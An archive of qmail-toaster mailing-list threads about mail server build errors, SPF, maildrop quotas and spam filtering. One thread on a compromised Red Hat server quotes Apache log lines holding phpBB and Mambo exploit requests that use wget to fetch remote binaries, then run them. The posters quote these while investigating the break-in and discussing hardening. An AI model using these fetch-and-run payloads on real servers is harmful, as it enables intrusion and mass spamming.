[toaster] qmail-smtpd.c compile error
I was wondering if any of you have run into these errors in your compiling of qmail. New Freebsd 7.2 server using all the toaster src downloads. I applied the qmail-toaster-0.9.1.patch to netqmail-1.05 and then ran MAKE and got these errors: ./compile qmail-smtpd.c qmail-smtpd.c:545: error: redefinition of 'saferead' qmail-smtpd.c:133: error: previous definition of 'saferead' was here qmail-smtpd.c:556: error: redefinition of 'ssin' qmail-smtpd.c:148: error: previous definition of 'ssin' was here qmail-smtpd.c: In function 'smtp_data': qmail-smtpd.c:688: error: 'rcptcount' undeclared (first use in this function) qmail-smtpd.c:688: error: (Each undeclared identifier is reported only once qmail-smtpd.c:688: error: for each function it appears in.) qmail-smtpd.c: In function 'main': qmail-smtpd.c:1226: warning: return type of 'main' is not 'int' *** Error code 1 Any help would be appreciated. Thanks, David Dresler
[toaster] Sasql
Greetings All, one of the servers i manage is running sasql 3.2.0 with SM 1.4.9a and i'm getting this error when using the allow sender link when viewing a message: ERROR: Database error in sasql_DBConnect: not found Fatal error: Call to a member function query() on a non-object in /usr/www/squirrelmail/plugins/sasql/sasql_db.php on line 329 However, i can add addresses from within the options/spam filters section just fine. This tells me the database configuration is working just fine, plus i can log into mysql from the command line using the username/password/database that sasql is being told to use. Any ideas? Thanks, David Dresler
[toaster] Hmm updated tmda and now it fails to automatically release messages
Had an older version working fine and went and updated it. (Doh!) Now it seems to work fine with the exception that confirmed emails are not automatically released. The sender's address makes it into the confirmed list and subsequent messages from them are delivered normally. If you use tmda.cgi and release the message manually, it goes through as expected but the sender then gets their original confirmation email sent back to them indicating that the message is no longer in the pending queue. I did some tests and see that qmail is indeed queueing the confirmation email from the sender even though tmda adds their address to the approved list. It seems that tmda must be failing to do the next step but I have no idea what that step would be. Qmail then sees the incomplete delivery and thus queues the message and tries again later. Any ideas? David M. Shirley [EMAIL PROTECTED]
[toaster] Unsubscription request
unsubscribe
Re: [toaster] Message send failure, 451 error
Thanks Adi, I did begin down that route, however then I tried a restart of the server (which had been running for about 140-something days) and that error has now gone away... weird, but good that it's gone. I do like to be able to find a reason for an error though; oh well, first case like that I've had using this toaster. Thanks and sorry for the delayed summary to this problem. David On Wed, 7 Mar 2007 10:47:26 +1030 (CST) [EMAIL PROTECTED] wrote: [...] my_relay_fqdn:unknown:my_relay_ip rcpt [EMAIL PROTECTED] : found existing recipient 2007-03-07 10:43:59.838144500 connect(): No such file or directory 2007-03-07 10:44:00.016430500 tcpserver: end 13403 status 0 I am running clamdb through the simscan patch though, so i'll check that out. For testing purposes, try to take simscan out, undefine QMAILQUEUE in /home/vpopmail/etc/tcp.smtp and see if it fixes the delivery. If yes, then take a careful look at simscan integration and configuration. Cheers, Adi Regards, David On Wed, 2007-03-07 at 02:29 +1030, [EMAIL PROTECTED] wrote: Thanks Shane, That was from /var/log/qmail/current, which I thought was a combination of qmail-send and qmail-smtpd, however I don't see all the info in it which I see in /var/log/qmail/smtpd/current so thanks here it is: log of a typical delivery attempt, looking at qmail-smtpd log # tail /var/log/qmail/smtpd/current | tai64nlocal 2007-03-07 02:27:13.881194500 tcpserver: ok 31451 0:my_ip_address:25 :my_relays_ip_address::45142 2007-03-07 02:27:14.508057500 CHKUSER accepted rcpt: from [EMAIL PROTECTED]:: remote mail.myrelay.net.au:unknown:my_relays_ip_address rcpt [EMAIL PROTECTED] : found existing recipient 2007-03-07 02:27:14.987645500 connect(): No such file or directory 2007-03-07 02:27:15.049539500 tcpserver: end 31451 status 0 This 'connect(): No such file or directory' message is new. You might want to try adding recordio to your smtpd/run file below to get a more detailed output of where this connect error is failing. Are you running clam and spamd? Maybe one of them isnt running for some reason? Thats about my only guess at this point. Shane I don't know which file it is talking about; the contents of my /service/qmail-smtpd/run file are: #!/bin/sh QMAILDUID=`id -u vpopmail` NOFILESGID=`id -g vpopmail` MAXSMTPD=`cat /var/qmail/control/concurrencyincoming` exec /usr/local/bin/softlimit -m 1000 \ /usr/local/bin/tcpserver -v -H -R -l 0 \ -x /home/vpopmail/etc/tcp.smtp.cdb -c $MAXSMTPD \ -u $QMAILDUID -g $NOFILESGID 0 smtp \ /var/qmail/bin/qmail-smtpd \ /home/vpopmail/bin/vchkpw /bin/true 21 (As you can see I have increased the memory limit whilst troubleshooting). I have verified that all executables exist, file permissions set correctly. I have done a qmailctl cdb. and # cat /home/vpopmail/etc/tcp.smtp 127.:allow,RELAYCLIENT= :allow,QMAILQUEUE=/var/qmail/bin/simscan /var/qmail/bin/simscan is there, permissions -rws--x--x, owned by clamav/root ...any more info I can provide?
[toaster] Message send failure, 451 error
Hi all, This problem regards a RH9 box I have had setup running a Shupp Toaster solidly for over 12 months. I have barely touched it in the last 6; system resources are fine and everything has been OK. Until last Friday, when people sending mail to my server started receiving something like this: (log entries from remote host, sending TO my server): 2007-03-07 00:56:15.625834500 status: local 0/10 remote 0/20 2007-03-07 00:59:35.128206500 new msg 261221 2007-03-07 00:59:35.128225500 info msg 261221: bytes 434 from [EMAIL PROTECTED] qp 27683 uid 89 2007-03-07 00:59:35.34700 starting delivery 30048: msg 261221 to remote [EMAIL PROTECTED] 2007-03-07 00:59:35.347571500 status: local 0/10 remote 1/20 2007-03-07 00:59:36.622510500 delivery 30048: deferral: 202.173.137.34_failed_after_I_sent_the_message./Remote_host_said:_451_mail_server_temporarily_rejected_message_(#4.3.0)/ 2007-03-07 00:59:36.622527500 status: local 0/10 remote 0/20 2007-03-07 00:59:41.023791500 new msg 261327 2007-03-07 00:59:41.023809500 info msg 261327: bytes 434 from [EMAIL PROTECTED] qp 27689 uid 89 2007-03-07 00:59:41.207978500 starting delivery 30049: msg 261327 to remote [EMAIL PROTECTED] 2007-03-07 00:59:41.207997500 status: local 0/10 remote 1/20 2007-03-07 00:59:42.484134500 delivery 30049: deferral: 202.173.137.34_failed_after_I_sent_the_message./Remote_host_said:_451_mail_server_temporarily_rejected_message_(#4.3.0)/ 2007-03-07 00:59:42.484154500 status: local 0/10 remote 0/20 All I can find in reference to an error 451 are mentions of SPF errors, and I have not changed my SPF configuration. I have however experimented by disabling SPF (echo 1 /var/qmail/control/spfbehaviour ; qmailctl restart) and (echo 0 /var/qmail/control/spfbehaviour ; qmailctl restart) however neither made any difference. I've done all the obvious things, checked repaired mysql databases, queried my domains with the qmail vpopmail tools to make sure everything is working there. But not change; my mail server is simply rejecting everything not sent from one of my hosted domains. Sounds like greylisting; but I haven't made any configuration changes. I'm stuck... Can anyone help? Many thanks, David
Re: [toaster] Message send failure, 451 error
Thanks Adrian, my bad - a typo. I was actually using control/spfbehavior David On Wed, 7 Mar 2007 01:13:17 +1030 (CST) [EMAIL PROTECTED] wrote: All I can find in reference to an error 451 are mentions of SPF errors, and I have not changed my SPF configuration. I have however experimented by disabling SPF (echo 1 /var/qmail/control/spfbehaviour ; qmailctl restart) and (echo 0 /var/qmail/control/spfbehaviour ; qmailctl restart) however neither made any difference. You might try using control/spfbehavior instead of control/spfbehaviour. See qmail-smtpd manpage for details. -- Adrian Pircalabu
Re: [toaster] Message send failure, 451 error
suggestion I modified qmail-smtpd/run to: #!/bin/sh QMAILDUID=`id -u vpopmail` NOFILESGID=`id -g vpopmail` MAXSMTPD=`cat /var/qmail/control/concurrencyincoming` exec /usr/local/bin/softlimit -m 1000 \ /usr/local/bin/tcpserver -v -H -R -l 0 \ -x /home/vpopmail/etc/tcp.smtp.cdb -c $MAXSMTPD \ -u $QMAILDUID -g $NOFILESGID 0 smtp \ recordio /var/qmail/bin/qmail-smtpd \ /home/vpopmail/bin/vchkpw /bin/true 21 The log file looks about the same to me (/var/log/qmail/smtpd/current) 2007-03-07 10:43:58.252494500 tcpserver: pid 13403 from my_relay_ip 2007-03-07 10:43:58.252499500 tcpserver: ok 13403 0:my_ip:25 :my_relay_ip::37633 2007-03-07 10:43:59.209212500 CHKUSER accepted rcpt: from [EMAIL PROTECTED]:: remote my_relay_fqdn:unknown:my_relay_ip rcpt [EMAIL PROTECTED] : found existing recipient 2007-03-07 10:43:59.838144500 connect(): No such file or directory 2007-03-07 10:44:00.016430500 tcpserver: end 13403 status 0 I am running clamdb through the simscan patch though, so i'll check that out. Regards, David On Wed, 2007-03-07 at 02:29 +1030, [EMAIL PROTECTED] wrote: Thanks Shane, That was from /var/log/qmail/current, which I thought was a combination of qmail-send and qmail-smtpd, however I don't see all the info in it which I see in /var/log/qmail/smtpd/current so thanks here it is: log of a typical delivery attempt, looking at qmail-smtpd log # tail /var/log/qmail/smtpd/current | tai64nlocal 2007-03-07 02:27:13.881194500 tcpserver: ok 31451 0:my_ip_address:25 :my_relays_ip_address::45142 2007-03-07 02:27:14.508057500 CHKUSER accepted rcpt: from [EMAIL PROTECTED]:: remote mail.myrelay.net.au:unknown:my_relays_ip_address rcpt [EMAIL PROTECTED] : found existing recipient 2007-03-07 02:27:14.987645500 connect(): No such file or directory 2007-03-07 02:27:15.049539500 tcpserver: end 31451 status 0 This 'connect(): No such file or directory' message is new. You might want to try adding recordio to your smtpd/run file below to get a more detailed output of where this connect error is failing. Are you running clam and spamd? Maybe one of them isnt running for some reason? Thats about my only guess at this point. Shane I don't know which file it is talking about; the contents of my /service/qmail-smtpd/run file are: #!/bin/sh QMAILDUID=`id -u vpopmail` NOFILESGID=`id -g vpopmail` MAXSMTPD=`cat /var/qmail/control/concurrencyincoming` exec /usr/local/bin/softlimit -m 1000 \ /usr/local/bin/tcpserver -v -H -R -l 0 \ -x /home/vpopmail/etc/tcp.smtp.cdb -c $MAXSMTPD \ -u $QMAILDUID -g $NOFILESGID 0 smtp \ /var/qmail/bin/qmail-smtpd \ /home/vpopmail/bin/vchkpw /bin/true 21 (As you can see I have increased the memory limit whilst troubleshooting). I have verified that all executables exist, file permissions set correctly. I have done a qmailctl cdb. and # cat /home/vpopmail/etc/tcp.smtp 127.:allow,RELAYCLIENT= :allow,QMAILQUEUE=/var/qmail/bin/simscan /var/qmail/bin/simscan is there, permissions -rws--x--x, owned by clamav/root ...any more info I can provide?
Re: [toaster] CHKUSER Logging
Nitchi DaMon lt;[EMAIL PROTECTED]gt; wrote:br / br / gt; br / gt; Is there a way to have CHKUSER log the connectionsbr / gt; that are denied for invalid users?br / gt; br / gt; The log for SMTP is the /var/log/qmail/smtpd/br / gt; br / gt; but it contains a great deal of information. Hasbr / gt; anyone created a patch or implemented MYsql loggingbr / gt; with this?br / gt; br / gt; br / gt; tiabr / gt; br / gt; nitch.br / gt; br /br /For me, Logcheck (a href=http://logcheck.org;http://logcheck.org//a) does a great job at separating stuff in my logs.nbsp; Here's an excerpt of what it parses out for qmail-smtp.nbsp; I get some more information from IMAPd and qmail-send.nbsp; These threshold amounts can be changed, I'm certain even the number it lists from each section could be as well but I haven't looked too much into it.nbsp; Thus far it works as I expect it to.br /br / pre - qmail-smtp Begin br /br / br / Connections from (Threshold of 1):br /211.237.173.234 - 5 Time(s)br / 194.150.155.44 - 5 Time(s)br /58.10.65.101 - 5 Time(s)br /...br / Blocked (Threshold of 1):br / 203.155.63.101 - 8 Time(s) By Blocked - seebr /a target=_blank href=http://www.spamcop.net/bl.shtml?203.155.63.101;http://www.spamcop.net/bl.shtml?203.155.63.101/abr / 124.120.133.201 - 7 Time(s) By Blocked - seebr /a target=_blank href=http://www.spamcop.net/bl.shtml?124.120.133.201;http://www.spamcop.net/bl.shtml?124.120.133.201/abr / 202.183.133.1 - 5 Time(s) By Blocked - seebr /a target=_blank href=http://www.spamcop.net/bl.shtml?202.183.133.1;http://www.spamcop.net/bl.shtml?202.183.133.1/abr / 204.212.126.159 - 5 Time(sbr /...br / Chkuser Rejects From (Threshold of 1):br / [EMAIL PROTECTED] - 8 Time(s)br / [EMAIL PROTECTED] - 6 Time(s)br / [EMAIL PROTECTED] - 4 Time(s)br / [EMAIL PROTECTED] - 4 Time(s)br /...br / Chkuser Rejects To (Threshold of 1):br / [EMAIL PROTECTED] - 6 Time(s)br / [EMAIL PROTECTED] - 5 Time(s)br / [EMAIL PROTECTED] - 5 Time(s)br / [EMAIL PROTECTED] - 4 Time(s)br /...br / Chkuser Rejects Remote (Threshold of 1):br / 222.121.186.98 - 20 Time(s)br / 203.121.80.2 - 19 Time(s)br / 122.4.34.18 - 17 Time(s)br / 122.50.186.60 - 17 Time(s)br /...br / Chkuser Rejects Reason (Threshold of 1):br / not existing recipient - 346 Time(s)br / br / Chkuser Accepts from (Threshold of 1):br /[EMAIL PROTECTED] - 2 Time(s)br / [EMAIL PROTECTED] - 2 Time(s)br / [EMAIL PROTECTED] - 2 Time(s)br / [EMAIL PROTECTED] - 1 Time(s)br / 125.137.14.83 - 14 Time(s)br /[EMAIL PROTECTED] - 5 Time(s)br /- 1 Time(s)br /...br / Chkuser Accepts to (Threshold of 1):br /[EMAIL PROTECTED] - 18 Time(s)br /br / Totals:br / Remote connections: 281br /Local connections: br / RBL blocked: 304br /Grand Total From: 584br / Percentage blocked: 52.055 %br / br / Chkuser Totals:br /Rejected: 346br / Accepted: 25/pre
Re: [toaster] strange delay on smtp connections
Rick Macdougall wrote: Carlos Solano wrote: I think relays.ordb.org is not working any more. I had the same issue, removed it and the problem was solved. Yup, you are correct and that should fix the OP's problem. Rick For information sake, ordb closed its doors on December 18, 2006 after 5 years of good/hard work. More information can be found at the provided URLs. http://www.virus.org/news/spyware/ordb-closed.html http://xbiz.com/news_piece.php?id=18748
[toaster] Re: Fw: failure notice
Adi Pircalabu wrote: Hi David, Looks like you are enforcing SPF beyond a reasonable limit :) See the attached bounce message. Cheers Subject: failure notice From: [EMAIL PROTECTED] Date: 24 Mar 2006 11:37:48 +0200 To: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Hi. This is the qmail-send program at mail.bitdefender.com. I'm afraid I wasn't able to deliver your message to the following addresses. This is a permanent error; I've given up. Sorry it didn't work out. [EMAIL PROTECTED]: 202.173.137.34 does not like recipient. Remote host said: 550 See http://spf.pobox.com/why.html?sender=adip%40gmx.netip=217.156.83.1receiver=0 (#5.7.1) Giving up on 202.173.137.34. --- Below this line is a copy of the message. Return-Path: [EMAIL PROTECTED] Received: (qmail 10484 invoked by uid 1010); 24 Mar 2006 11:37:42 +0200 Received: from apircalabu.dsd.ro (10.10.15.22) by mail.bitdefender.com with SMTP; 24 Mar 2006 11:37:42 +0200 Date: Fri, 24 Mar 2006 11:35:33 +0200 From: Adi Pircalabu [EMAIL PROTECTED] To: toaster@shupp.org Cc: [EMAIL PROTECTED] Subject: Re: [toaster] Using maildrop with toaster quota support Message-ID: [EMAIL PROTECTED] In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] X-Mailer: Sylpheed-Claws 2.0.0 (GTK+ 2.8.16; i386-portbld-freebsd6.1) X-BitDefender-Scanner: Clean, Agent: BitDefender Qmail 1.6.2 on mail.bitdefender.com Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: quoted-printable X-BitDefender-SpamStamp: 1.1.4 04940111AAEAI X-BitDefender-Spam: No (13) On Thu, 23 Mar 2006 17:48:11 +1030 David david=40davidbranford.net wrote: MAILDIRQUOTA=3D=60=7Evpopmail/bin/vuserinfo -q =5BEMAIL PROTECTED=5D in the maildrop filter file. Can anybody tell me if this works with the Shupp toaster? I have successfully integrated maildrop as my LDA in a Shupp toaster, but it seems blissfully unaware of users' quotas and quota warning/over-quota messages get lost, and when the account fills up, maildrop just spits errors and the mail stops with maildrop. I am looking for a way to make it quota-aware. Why don't you use deliverquota (part of courier-imap package, I guess)? I think it does exactly what you need. >From the manpage: NAME deliverquota - deliver to a maildir with a quota SYNOPSIS deliverquota =5B -c =5D =5B -w percent =5D maildir quota DESCRIPTION deliverquota delivers mail to a maildir taking into account any software-imposed quota on the maildir. This manually-enforced quota mecha- nism is described in the maildirquota(7) and maildirmake(1) manual pages. Instead of setting up your mail server to deliver the message directly to a maildir, configure the mail server to run the deliv- erquota program in order to deliver the message, and specify the loca- tion of the maildir as the argument to deliverquota. Sorry about the late reply to this one Adi - I lost this e-mail for a while. Thanks for the suggestion of deliverquota - I will test it and see if I can make it do what I need. About the spf rules - I can't find where they are configured in my Shupp toaster - I will have a go at relaxing them. Regards, David.
Re: [toaster] Using maildrop with toaster quota support
Bob Hutchinson wrote: On Thursday 23 Mar 2006 07:18, David wrote: Hi all, I would like to integrate maildrop at the .qmail file level, per-user. Something like a simple: |maildrop .mailfilter in the .qmail file (I read somewhere that I might need to | /usr/sbin/preline maildrop .mailfilter) I found a message in the list archives and have been referring to it at: http://www.mail-archive.com/toaster@shupp.org/msg03632.html Somebody (I think it was Bob Hutchinson) posted as part of an example in there: yeah, it was me ;-) I haven't figured out a way to get maildrop to check the quota on the fly either, ~vpopmail/bin/vuserinfo --help tells me that the -Q parameter returns a percentage, eg 45%, whereas -q just returns the quota set, not that helpful. So it should in principle be possible to write a script that tests the quota using -Q and returns something for maildrop to interpret and act upon. I'm not sure how exactly but this might get you started MAILDIRPERCENT=`~vpopmail/bin/vuserinfo -Q [EMAIL PROTECTED] | sed -e 's/%//'` $MAILDIRPERCENT should then contain 100 if the box is full Do let the list know if you crack it, I'm sure others will want to know too. MAILDIRQUOTA=`~vpopmail/bin/vuserinfo -q [EMAIL PROTECTED] in the maildrop filter file. Can anybody tell me if this works with the Shupp toaster? I have successfully integrated maildrop as my LDA in a Shupp toaster, but it seems blissfully unaware of users' quotas and quota warning/over-quota messages get lost, and when the account fills up, maildrop just spits errors and the mail stops with maildrop. I am looking for a way to make it quota-aware. Regards, David Thanks for the help Bob; I will mess about some more. Regards, David PS Sorry for late reply - was away from my email for a few days.
[toaster] Using maildrop with toaster quota support
Hi all, I would like to integrate maildrop at the .qmail file level, per-user. Something like a simple: |maildrop .mailfilter in the .qmail file (I read somewhere that I might need to | /usr/sbin/preline maildrop .mailfilter) I found a message in the list archives and have been referring to it at: http://www.mail-archive.com/toaster@shupp.org/msg03632.html Somebody (I think it was Bob Hutchinson) posted as part of an example in there: MAILDIRQUOTA=`~vpopmail/bin/vuserinfo -q [EMAIL PROTECTED] in the maildrop filter file. Can anybody tell me if this works with the Shupp toaster? I have successfully integrated maildrop as my LDA in a Shupp toaster, but it seems blissfully unaware of users' quotas and quota warning/over-quota messages get lost, and when the account fills up, maildrop just spits errors and the mail stops with maildrop. I am looking for a way to make it quota-aware. Regards, David
[toaster] Toaster compromised? Or system?
it, or if an operator thinks it fine I will... That dc.txt was a looong list of e-mail addresses. As is lista-10.txt. Granted I'm not a very experienced linux user (PC's for 10 or so years, Linux for only a few), but I have been following security bulletins and best practice everywhere, changing root passwords, no shell accounts etc. and I didn't think my system was too insecure. On a bright side, it was a good little stress test to see the system hold up under 40,000+ e-mails on our connection. On a down side, potential recipients of such an e-mail attack are not going to see things that way Any help anybody can provide in diagnosing this intrusion and/or preventing it would be greatly appreciated. I will hold off on any more detail to try to keep this e-mail under the length of an encyclopaedia. Regards, David
Re: [toaster] Toaster compromised? Or system?
Rick Macdougall wrote: David wrote: *warning long email* Hi all, We have been running a Shupp toaster for about 18 months on a Redhat 9 box, and the other day it appears it was compromised by spammers. I thought if I posted a few things I found about the system drive perhaps someone might be able to help me figure out how/how to prevent this... apache 32499 32498 0 Feb08 ?S 0:00 \_ perl /tmp/dc.txt 67.159.2 apache 32503 32499 0 Feb08 ?S 0:00 \_ /bin/bash Hi, I believe that is the xmlprc exploit against apache/php (could be the phpbb exploit, but I'm pretty sure the dc.txt is part of the xmlrpc). Upgrade your php and apache, find the xmlrpc.php in question and fix it. You can then use a tool like qmail-remove to clean out the queue. Regards, Rick !DSPAM:43ec99dc204751732444004! Thanks Rick, I'm running php 4.3.10 and I can't find any information about a xmlrpc exploit; I also can't find any entries in my logs about dc.txt. I will keep looking. Thanks, David.
Re: [toaster] Toaster compromised? Or system?
Thanks Peter - reassuring to know that someone else thinks they probably didn't get root... I have been watching ps and netstat -p and haven't seen anything suspicious, nor seen any more rogue messages in my mail queue... fingers crossed :) I have plans to replace this box ASAP however. I uncovered this in the apache logs: ./www.myvirtualhost.domain-access_log:86.35.6.242 - - [25/Jul/2005:21:32:12 +0930] GET /store/phpbb2/viewtopic.php?t=2rush=% 65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa% 3B%20%65%63%68%6F%20%5F%45%4E%44%5Fhighlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%7 3%68%5D%29.%2527 HTTP/1.1 200 21138 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the system weathered that one. Closer to date is: ./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error] [client 85.214.20.161] request failed: erroneous characters aft er protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=mosConfig_absolute_path=http: //209.136.48.69/cmd.gif?cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\\x01.1 But it looks like that one failed. Oh well time to update php and clean out a few old phpbb installs. Thanks all for your help. David Peter Maag wrote: Take a look through your Apache logs to see the URL call they used to exploit the /tmp directory. Try searching for strings like: 'wget' or 'ftp' within your apache access logs. Chances are you will uncover the cuplrit script. Judging by the permissions in the files in your /tmp directory they most likely did not get root on the box. In the future I would recommend chmod'ing the following executables to 700: wget ftp lynx If you can get away with chmoding perl to 700 that will help things also. Due to the permission settings on this files, they had to have executed the script with: perl filename.pl Check out mod_security for Apache as well. Peter On 2/10/06, *David* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Rick Macdougall wrote: David wrote: *warning long email* Hi all, We have been running a Shupp toaster for about 18 months on a Redhat 9 box, and the other day it appears it was compromised by spammers. I thought if I posted a few things I found about the system drive perhaps someone might be able to help me figure out how/how to prevent this... apache 32499 32498 0 Feb08 ?S 0:00 \_ perl /tmp/dc.txt 67.159.2 apache 32503 32499 0 Feb08 ?S 0:00 \_ /bin/bash Hi, I believe that is the xmlprc exploit against apache/php (could be the phpbb exploit, but I'm pretty sure the dc.txt is part of the xmlrpc). Upgrade your php and apache, find the xmlrpc.php in question and fix it. You can then use a tool like qmail-remove to clean out the queue. Regards, Rick Thanks Rick, I'm running php 4.3.10 and I can't find any information about a xmlrpc exploit; I also can't find any entries in my logs about dc.txt. I will keep looking. Thanks, David. !DSPAM:43ecaff4216508586114564!
RE: [toaster] courier-authlib gmake problem with FC4 on x86_64
-Original Message- From: Bill Shupp [mailto:[EMAIL PROTECTED] Sent: Friday, 30 December 2005 5:31 AM To: toaster@shupp.org Subject: Re: [toaster] courier-authlib gmake problem with FC4 on x86_64 David wrote: Do you get that error when using --without-authmysql? configuring courier-authlib-0.58 I do: ]# ./configure --with-redhat --without-authmysql then I make with: ]# gmake Which gives: snip Linking libauthvchkpw.la /usr/bin/ld: /home/vpopmail/lib/libvpopmail.a(vpopmail.o): relocation R_X86_64_32S against `a local symbol' can not be used when making a shared object; recompile with -fPIC /home/vpopmail/lib/libvpopmail.a: could not read symbols: Bad value collect2: ld returned 1 exit status gmake[2]: *** [libauthvchkpw.la] Error 1 gmake[2]: Leaving directory `/var/src/toaster/courier-authlib-0.58' gmake[1]: *** [all-recursive] Error 1 gmake[1]: Leaving directory `/var/src/toaster/courier-authlib-0.58' gmake: *** [all] Error 2 I have vpopmail-5.4.10 compiled with the libvpopmail_a_CFLAGS = -fPIC patch applied (manually) to Makefile.am I just noticed, however, that it is possible that doing a ./configure for vpopmail removes this line from Makefile.am, and that a subsequent make is unaffected? I don't know, will keep experimenting. Before compiling courier-authlib, try: export CFLAGS= -fPIC to set the environment. Unfortunately I get the same result: Linking libauthmysql.la /usr/bin/ld: /usr/lib/libmysqlclient.a(libmysql.o): relocation R_X86_64_32 against `a local symbol' can not be used when making a shared object; recompile with -fPIC /usr/lib/libmysqlclient.a: could not read symbols: Bad value collect2: ld returned 1 exit status gmake[2]: *** [libauthmysql.la] Error 1 When I try that. Thanks, David Regards, Bill !DSPAM:43b43274139691476250465!
RE: [toaster] courier-authlib gmake problem with FC4 on x86_64
I have been researching some more and now I am a little confused about the vpopmail relationship... could you tell me where/how I need to apply this patch? Will patching vpopmail really help my courier-authlib compile problem? David -Original Message- From: Tom Collins [mailto:[EMAIL PROTECTED] Sent: Wednesday, 28 December 2005 4:34 PM To: toaster@shupp.org Subject: Re: [toaster] courier-authlib gmake problem with FC4 on x86_64 I think it's something about the new courier-imap that requires libvpopmail to be compiled with the -fPIC option. Here's a patch you can apply to 5.4.10: Index: Makefile.am === RCS file: /cvsroot/vpopmail/vpopmail/Makefile.am,v retrieving revision 1.17.2.2 retrieving revision 1.17.2.3 diff -u -d -r1.17.2.2 -r1.17.2.3 --- Makefile.am 16 Dec 2004 16:07:48 - 1.17.2.2 +++ Makefile.am 2 Sep 2005 18:59:14 - 1.17.2.3 @@ -18,6 +18,7 @@ libvpopmail_a_SOURCES=$(COMMONSOURCES) libvpopmail_a_LIBADD = cdb/*.o +libvpopmail_a_CFLAGS = -fPIC [EMAIL PROTECTED]@/bin vpopmailbin_PROGRAMS = vchkpw vdelivermail clearopensmtp vadddomain \ -Tom On Dec 27, 2005, at 6:04 PM, David wrote: Just thought I'd add that the previous version toaster compiled fine on FC3 on x86_64 (AMD Athlon 64). David -Original Message- From: David [mailto:[EMAIL PROTECTED] Sent: Wednesday, 28 December 2005 11:37 AM To: toaster@shupp.org Subject: RE: [toaster] courier-authlib gmake problem with FC4 on x86_64 No it's 5.4.10... but this seems to be a problem with compiling courier-authlib with libauthmysql.la? Would using vpopmail 5.4.13 fix that? Thanks, David -Original Message- From: Tom Collins [mailto:[EMAIL PROTECTED] Sent: Wednesday, 28 December 2005 7:47 AM To: toaster@shupp.org Subject: Re: [toaster] courier-authlib gmake problem with FC4 on x86_64 Does the toaster use vpopmail 5.4.13? That's where we added the -fPIC option when compiling libvpopmail. On Dec 27, 2005, at 11:18 AM, David Branford wrote: Appologies - I didn't proof-read properly. ...appears to be a similar problem to _... should include a link to a message which I thought discussed a similar problem. Here it is: http://www.mail-archive.com/toaster@shupp.org/msg02976.html David Hi list, I'm encountering what appears to be a similar problem to _ when I get the the courier-imap stage of the toaster install. The following is a tail of the output of the gmake command run right after a successful ./configure --with-redhat (system is a 64-bit AMD system running FC4_x86_64): tail Linking libauthldap.la Compiling authmysql.c Compiling preauthmysql.c Compiling authmysqllib.c Linking libauthmysql.la /usr/bin/ld: /usr/lib/libmysqlclient.a(libmysql.o): relocation R_X86_64_32 against `a local symbol' can not be used when making a shared object; recompile with -fPIC /usr/lib/libmysqlclient.a: could not read symbols: Bad value collect2: ld returned 1 exit status gmake[2]: *** [libauthmysql.la] Error 1 gmake[2]: Leaving directory `/var/src/toaster/courier-authlib-0.58' gmake[1]: *** [all-recursive] Error 1 gmake[1]: Leaving directory `/var/src/toaster/courier-authlib-0.58' gmake: *** [all] Error 2 /tail Looks like http://sourceforge.net/mailarchive/forum.php? thread_id=8106414forum_id=35252 is a similar error. I am using the most recent version of the toaster as of 28-12-2005 from shupp.org/toaster Can anybody suggest another way around this perhaps? I don't want to have to install a 32-bit OS just to get courier-authlib working! However that's a rather essential component... Regards, David !DSPAM:43b22ad4203142343143565!
RE: [toaster] courier-authlib gmake problem with FC4 on x86_64
Thanks Tom, I applied that line manually to Makefile.am in the vpopmail 5.4.10 source. Unfortunately I still get the same error on gmake of courier-authlib: Linking libauthmysql.la /usr/bin/ld: /usr/lib/libmysqlclient.a(libmysql.o): relocation R_X86_64_32 against `a local symbol' can not be used when making a shared object; recompile with -fPIC /usr/lib/libmysqlclient.a: could not read symbols: Bad value Is this really caused by vpopmail and not something in courier-authlib? Thanks for your help, David -Original Message- From: Tom Collins [mailto:[EMAIL PROTECTED] Sent: Thursday, 29 December 2005 11:45 AM To: toaster@shupp.org Subject: Re: [toaster] courier-authlib gmake problem with FC4 on x86_64 On Dec 28, 2005, at 11:04 AM, David wrote: I unfortunately cannot apply the patch to the included version of vpopmail 5.4.10 either - I receive: patching file Makefile.am Hunk #1 FAILED at 18. 1 out of 1 hunk FAILED -- saving rejects to file Makefile.am.rej Then apply it manually. Look in the file for this line: libvpopmail_a_LIBADD = cdb/*.o And add this line after it: libvpopmail_a_CFLAGS = -fPIC make clean; ./configure (with your options); make; make install -- Tom Collins - [EMAIL PROTECTED] QmailAdmin: http://qmailadmin.sf.net/ Vpopmail: http://vpopmail.sf.net/ You don't need a laptop to troubleshoot high-speed Internet: sniffter.com !DSPAM:43b33893168177634914536!
[toaster] courier-authlib gmake problem with FC4 on x86_64
Hi list, I'm encountering what appears to be a similar problem to _ when I get the the courier-imap stage of the toaster install. The following is a tail of the output of the gmake command run right after a successful ./configure --with-redhat (system is a 64-bit AMD system running FC4_x86_64): tail Linking libauthldap.la Compiling authmysql.c Compiling preauthmysql.c Compiling authmysqllib.c Linking libauthmysql.la /usr/bin/ld: /usr/lib/libmysqlclient.a(libmysql.o): relocation R_X86_64_32 against `a local symbol' can not be used when making a shared object; recompile with -fPIC /usr/lib/libmysqlclient.a: could not read symbols: Bad value collect2: ld returned 1 exit status gmake[2]: *** [libauthmysql.la] Error 1 gmake[2]: Leaving directory `/var/src/toaster/courier-authlib-0.58' gmake[1]: *** [all-recursive] Error 1 gmake[1]: Leaving directory `/var/src/toaster/courier-authlib-0.58' gmake: *** [all] Error 2 /tail Looks like http://sourceforge.net/mailarchive/forum.php?thread_id=8106414forum_id=35252 is a similar error. I am using the most recent version of the toaster as of 28-12-2005 from shupp.org/toaster Can anybody suggest another way around this perhaps? I don't want to have to install a 32-bit 